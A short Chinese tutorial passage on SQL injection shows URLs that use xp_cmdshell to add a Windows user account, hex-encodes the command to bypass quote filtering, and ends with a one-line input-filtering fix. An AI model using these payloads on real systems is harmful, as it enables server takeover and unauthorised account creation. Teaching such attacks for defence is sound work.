//www.gxlcms.com/show.asp?id=1;exec master.dbo.xp_cmdshell 'net user angel pass /add';-- 
 
這往往給大家造成誤解，認為只要變量過濾了'就可以防止SQL Injection攻擊，這種意識為大量程序可以注入埋下禍根，其實僅僅過濾'是不夠的，在'被過濾的情況下我們照樣玩，看下面語句： 
 代碼如下:

//www.gxlcms.com/show.asp?id=1;declare%20@a%20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a;-- 
 
　　是不是跟上面的那句有很大區別？可是效果完全是一樣的。其實這些都是SQL語句。 
 代碼如下:

0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400 
 
這句是“net user angel pass /add”的16進制格式。了解SQL的朋友就容易明白，先聲明一個變量a，然后把我們的指令賦值給a，然后調用變量a最終執行我們輸入的命令。變量a可以是任何命令。如下： 
 代碼如下:

declare @a sysname 
select @a= 
exec master.dbo.xp_cmdshell @a 
 
解決辦法： 
過濾變量，限制只允許輸入特定字符。比如對于數字類型的變量就限制只能輸入數字類型的數據。具體就不說了。這完全是程序作者自由發揮了。
 
 




聲明：本網頁內容旨在傳播知識，若有侵權等問題請及時與本網聯系，我們將在第一時間刪除處理。TEL:177 7030 7066 E-MAIL:11247931@qq.com